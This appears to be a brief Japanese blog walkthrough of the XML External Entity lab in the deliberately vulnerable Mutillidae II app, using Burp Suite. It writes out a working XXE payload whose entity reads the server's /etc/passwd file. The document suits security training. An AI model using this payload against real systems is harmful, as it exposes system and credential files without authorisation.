Shikata Ga Nai

Private? There is no such things.

MutillidaeⅡで2017>A4>XML External Entity Injection>XML Validator②

Hello there, ('ω')ノ

 

OWASP 2017 ⇨ A4 ⇨ XML External Entity Injection ⇨ XML Validatorを選択して。

 

f:id:ThisIsOne:20200127133813p:plain

 

まずは、サンプルを入力して結果を確認して。

 

f:id:ThisIsOne:20200127132804p:plain

 

Burp Suiteで、XMLのパラメータを確認して。

 

f:id:ThisIsOne:20200127133237p:plain

 

今回は、下記のペイロードを仕掛けることに。

まずは、『Decoder』タグでエンコードしなくては。

 

 <?xml version="1.0"?>
 <!DOCTYPE change-log[
  <!ENTITY systemEntity SYSTEM "../../../../etc/passwd">
 ]>
 <change-log>
 <text>&systemEntity;</text>
 </change-log>

 

f:id:ThisIsOne:20200127133134p:plain

 

エンコードされた内容をXMLのパラメータと置き換えて。

『Intercept is off』に切り替えると。

 

f:id:ThisIsOne:20200127133356p:plain

 

XMLのペイロードが実行された。

 

f:id:ThisIsOne:20200127132554p:plain

 

Best regards, (^^ゞ